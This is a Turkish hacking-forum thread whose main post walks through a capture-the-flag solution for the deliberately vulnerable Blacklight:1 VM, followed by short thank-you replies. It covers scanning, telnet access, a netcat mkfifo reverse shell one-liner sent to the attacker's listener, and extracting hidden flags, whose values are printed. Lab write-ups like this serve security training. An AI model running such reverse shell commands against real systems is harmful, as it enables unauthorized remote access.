Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Information Technology’s
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm



Blacklight:1 Açıklı Makine Çözümü 'Rairsa

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 12-09-2018 21:18   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular


  
Blacklight:1 Açıklı Makine Çözümü 'Rairsa




Merhaba THT ailesi
Sizlere bugün Blacklight:1 açıklı makine çözümünü anlatacağım.


Blacklight:1'i BURADAN indirebilirsiniz.

Görevler;
1-Flag1
2-Flag2
3-Hash

Öncelikle;
Kod:
netdiscover
parametresi ile makinemizin ip adresini öğrenelim.




IP adresimizi öğrendiğimize göre nmap ile tarama yapalım
Kod:
nmap -p- -A 10.0.2.9


Tarama sonuçlarına baktığımızda 80. port ve 9072 numaralı bilinmeyen bir port açık.


IP adresimizi tarayıcımıza yazalım bakalım neler varmış



Karşımıza bir web sayfası çıktı ve içinde "Acemi Düzeyde CTF" yazıyor.

Dirb programı ile taratalım

Kod:
dirb http://10.0.2.9/


Tarama sonucunda robots.txt adında ki sayfa dikkatimi çekiyor. Linki kopyalayıp tarayıcımıza yapıştıralım.

Kod:
10.0.2.9/robots.txt


Sayfa içinde "flag1.txt" yazıyor. Url'mizin sonuna yapıştıralım.

Kod:
10.0.2.9/flag1.txt


İlk bayrağımızı bulduk. Ancak alt tarafta bir şeyler daha yazıyor.
"9072. Sır evde"
Hatırlarsanız nmap ile makinemizi taratmıştık ve 9072 numaralı ismi bilinmeyen portta açık vardı.

Buradan yola çıkarak telnet ile açıklı makineye bağlanmayı deneyelim.
Kod:
telnet 10.0.2.9 9072


Telnet ile makinemize bağlandık. Şimdi ise reverse shell'imizi enjecte edelim.

Reverse shell'leri BURADAN bulabilirsiniz.

Reverse shell'imizi yazmak için .exec yazıyoruz.

Not: Shell'imizi yazdıktan sonra "enter" tuşuna basmıyoruz enter tuşuna portu dinlerken basacağız.

Kod:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ipadresiniz portnumarası >/tmp/f
İp adresinizi "ifconfig" yazarak öğrenebilirsiniz. Port numarası olarak ben 4444'ü kullandım.

Shell'imizi yazdıktan sonra sıra port'u dinlemekte

Kod:
nc -lvp 4444


Makinemize sızmayı başardık. Hatırlarsanız flag1.txt sayfasında "The secret is at home" yazıyordu.
Şu anda root dizinindeyiz "cd .." yaparak ana dizine geçmeyi deniyelim.



Şimdi "cd home" yazarak home dizinine geçelim.

home dizinine geçtikten sonra ls komutu ile dizinin içine bulunanları listeleyelim.
blacklight adlı klasör karşımıza çıktı "cd blacklight" yazalım.
Tekrardan "ls" komutu ile blacklight dizininin içinde bulunanları listeleyelim.
Karşımıza "console.rb" ve "hash.txt" adlı iki dosya çıktı.
"cat hash.txt" yazarak hash dosyamızı okuyalım.




Şimdi sıra flag2'yi bulmaya geldi.

Hatırlarsanız flag1 sayfasında "The secret is at home" yazıyordu bunun anlamı Gizli/Sır evde.

Basit mantık kurarak biz home/blacklight dizinindeyiz.
Cümlemizdeki sır kelimesi "ls -a" parametresi olabilirmi?



Not : ls -a parametresi bulunduğunuz dizindeki gizli dosyaları gösterir.

Resmin alt taraflarında ".secret" adlı klasör olduğunu görüyoruz.
"cd .secret" yazarak bu klasörün içine girmeyi deneyelim ardından "ls" komutu ile klasörün içindekileri listeleyelim



Flag2'yi bulduk ancak .jpg formatında bulduk. Flag2'yi daha yakından incelemek için;

Kod:
cp flag2-inside.jpg /var/www/html
Makinemiz bir web sitesiydi bu komut ile flag2'yi web sitesinin içine koyduk.

Flag2'yi daha yakından incelemek için tarayıcımıza;

Kod:
10.0.2.9/flag2-inside.jpg
yazıyoruz.



Resimde dikkat ettiyseniz OUT ve GUESS yazıları büyük. OUTGUESS'i google'da kısa bir araştırmadan sonra outguess diye bir tool'a ulaştım.
Programın GitHub sayfasına BURADAN ulaşabilirsiniz.

Bu resmi masaüstüne kaydediyoruz ve yeni bir terminal açıp içine
Kod:
cd Desktop
yazıyoruz ardından
Kod:
git clone https://github.com/crorvick/outguess.git
yazıyoruz

Programımız indikten sonra terminale "cd outguess" yazıyoruz
sonra terminale
Kod:
./configure && make
yazıyoruz.



Terminale(outguess klasörünün içindeki terminale)
Kod:
./outguess -r /root/Desktop/flag2-inside.jpg -t flag.txt
yazıyoruz.

Tekrardan terminale gelip
Kod:
cat flag.txt
yazıyoruz ve



Flag2'yi buluyoruz

Flag1:fc4c7223964a26b152823d14f129687207e7fe15
Flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4
Hash:b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb97741 3a932a828b5c52ef5a6

Makinenin çözümü bu kadar Eğer anlamadığınız bir yer olursa yorumlara yazabilir veya öm atabilirsiniz.
'Rairsa
    


___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Online  
 
Alıntı ile Cevapla
Alt 12-09-2018 21:21   #2
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular


  


Eline Sağlık
    
 Offline  
 
Alıntı ile Cevapla
Alt 12-09-2018 21:26   #3
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
01/2018
Nereden
T.C
Mesajlar
Konular


  


Eline Sağlik Devrem
    


___________________________________________

Tarihini bilmeyen millet yok olmaya mahkumdur….
Mustafa Kemal AtaTÜRK


Sayilmayiz Parmakla Ölmeyiz Vurulmakla...
 Offline  
 
Alıntı ile Cevapla
Alt 12-09-2018 21:31   #4
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular


  


Alıntı:
4UR0R4´isimli üyeden Alıntı Mesajı göster
Eline Sağlik Devrem
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Eline Sağlık
Teşekkür ederim
    


___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Online  
 
Alıntı ile Cevapla
Alt 12-09-2018 21:33   #5
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Mantı V2
Mesajlar
Konular


  


Ellerine sağlık, umarım bu serinin devamını getirirsin.
    


___________________________________________

Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
 Offline  
 
Alıntı ile Cevapla
Alt 12-09-2018 22:00   #6
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular


  


Alıntı:
Belvando´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık, umarım bu serinin devamını getirirsin.
Teşekkür ederim devamını getirmeyi düşünüyorum
    


___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Online  
 
Alıntı ile Cevapla
Alt 26-09-2018 11:56   #7
  • Tuğgeneral
  • Üye Bilgileri
Üyelik tarihi
09/2017
Nereden
Moderasyon
Yaş
28
Mesajlar
Konular


  


Eline sağlık rairsa.
    


___________________________________________

TürkHackTeam | Moderasyon

 Offline  
 
Alıntı ile Cevapla
Alt 02-10-2018 18:40   #8
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
05/2016
Nereden
Nereye !
Yaş
3
Mesajlar
Konular


  


Abi şöyle güzel bir konuya neden 2 - 3 yorum gelmiş bakın inceleyin la bi
    


___________________________________________

Zincire vurulmuş küfürlerimin kilidi ile oynama !
 Offline  
 
Alıntı ile Cevapla
Alt 02-10-2018 18:42   #9
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular


  


Alıntı:
MwTugi´isimli üyeden Alıntı Mesajı göster
Abi şöyle güzel bir konuya neden 2 - 3 yorum gelmiş bakın inceleyin la bi
Teşekkürler
    


___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Online  
 
Alıntı ile Cevapla
Alt 02-10-2018 18:53   #10
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
10/2017
Nereden
Baku
Mesajlar
Konular


  


Baya guzel ve degerli bir konu zahmetinin karwil;igini alarsin inweallah Ellerine saglik dahada irelilemeni diliyorum
    


___________________________________________

Bildiklerim Bilmediklerimin 0.0001% ediyor.

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2018

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
film izle

wau

Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.